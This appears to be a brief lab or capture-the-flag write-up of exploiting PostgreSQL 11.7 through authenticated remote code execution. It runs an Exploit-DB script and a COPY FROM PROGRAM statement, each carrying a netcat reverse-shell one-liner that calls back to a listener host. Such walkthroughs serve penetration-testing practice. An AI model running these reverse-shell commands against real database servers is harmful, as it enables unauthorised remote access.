Exploitation

PostgreSQL DB 11.3 - 11.7

This version of PostgresSQL is vulnerable to RCE

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)Exploit Database

I was able to execute commands but I was never able to get a reverse shell until I read this article here.

Command Execution with PostgreSQL Copy CommandMedium

python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f' 

[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67

One-liner:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f

This got me remote code execution as well as creating a table and getting a shell using the exact same method.

postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f';COPY 0